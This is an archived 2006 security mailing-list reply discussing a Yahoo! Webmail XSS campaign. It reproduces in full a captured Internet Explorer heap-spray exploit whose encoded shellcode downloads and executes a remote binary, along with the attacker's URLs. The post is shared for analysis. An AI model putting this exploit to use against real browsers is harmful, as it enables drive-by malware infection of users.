Dailydave mailing list archives

RE: [Argeniss] Alert - Yahoo! Webmail XSS

From: "C programming List" <cprog.list () gmail com>
Date: Tue, 18 Apr 2006 17:54:23 -0400

The top page a level above that is quite interesting too.  Although I'd only
recommend browsing it with wget and notepad, to be on the safe side.  Should
someone perhaps notify all those banks mentioned?  (Then again, telling them
"Watch out for suspicious CC transactions from eastern European nations"
probably isn't telling them anything they don't already know....)


   cheers,
     DaveK


Looking at the front page on my regular browsers(firefox, galeon,
konqueror) the 3 die, apparently from what I see, the browser
makes repetitive call to mmap2
mmap2(NULL, 524288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS,
-1, 0) = 0x8af82000

I dont know what he wants, but apparently is just to map as much
memory as possible. Anyone knows what script he uses to generate this
?
THere is also http://www.w00tynetwork.com/news.htm which has what I
beleive is an IE explorer exploit, maybe another browser, but windows
oriented.

<head>
<meta http-equiv="refresh" content="2;url=news.htm">
</head>
<input type="checkbox" id="javascript">
<SCRIPT language="javascript">

shellcode = unescape(
    "%uCCE9%u0000%u5F00%u56E8%u0000%u8900%u50C3%u8E68%u0E4E%uE8EC" +
    "%u0060%u0000%uC931%uB966%u6E6F%u6851%u7275%u6D6C%uFF54%u50D0" +
    "%u3668%u2F1A%uE870%u0046%u0000%uC931%u5151%u378D%u8D56%u0877" +
    "%u5156%uD0FF%u6853%uFE98%u0E8A%u2DE8%u0000%u5100%uFF57%u31D0" +
    "%u49C9%u9090%u6853%uD87E%u73E2%u19E8%u0000%uFF00%u55D0%u6456" +
    "%u30A1%u0000%u8B00%u0C40%u708B%uAD1C%u688B%u8908%u5EE8%uC35D" +
    "%u5553%u5756%u6C8B%u1824%u458B%u8B3C%u0554%u0178%u8BEA%u184A" +
    "%u5A8B%u0120%uE3EB%u4935%u348B%u018B%u31EE%uFCFF%uC031%u38AC" +
    "%u74E0%uC107%u0DCF%uC701%uF2EB%u7C3B%u1424%uE175%u5A8B%u0124" +
    "%u66EB%u0C8B%u8B4B%u1C5A%uEB01%u048B%u018B%uE9E8%u0002%u0000" +
    "%uC031%uEA89%u5E5F%u5B5D%uE8C3%uFF2F%uFFFF%u6F61%u2E6C%u7865" +
    
"%u0065%u7468%u7074%u2F3A%u772F%u7777%u772E%u3030%u7974%u656E%u7774%u726F%u2E6B%u6F63%u2F6D%u6962%u616E%u7972%u2E32%u7865%u0065%u0000");

bigblock = unescape("%u9090%u9090");
slackspace = 20 + shellcode.length

while (bigblock.length < slackspace)
    bigblock += bigblock;

fillblock = bigblock.substring(0, slackspace);

block = bigblock.substring(0, bigblock.length-slackspace);

while(block.length + slackspace < 0x40000)
    block = block + block + fillblock;

memory = new Array();

for ( i = 0; i < 2020; i++ )
    memory[i] = block + shellcode;

var r = document.getElementById('javascript').createTextRange();

</script>

This shellcode downloads and execs this binary
http://www.w00tynetwork.com/binary2.exe. Anyone knows what the binary
does ?
Ive tried to get the file that the xss is going to download but the
address never replies.
http://211.22.14.50/.yahoomail/x.htm
A whois on the address gives a comany named Ceraco International Co., Ltd.
Which I guess is s drone..
Anyone has any more on this web?
-daniel

Current thread:

[Argeniss] Alert - Yahoo! Webmail XSS Cesar (Apr 18)
- RE: [Argeniss] Alert - Yahoo! Webmail XSS Dave Korn (Apr 18)
- RE: [Argeniss] Alert - Yahoo! Webmail XSS El Nahual (Apr 18)
- <Possible follow-ups>
- RE: [Argeniss] Alert - Yahoo! Webmail XSS C programming List (Apr 18)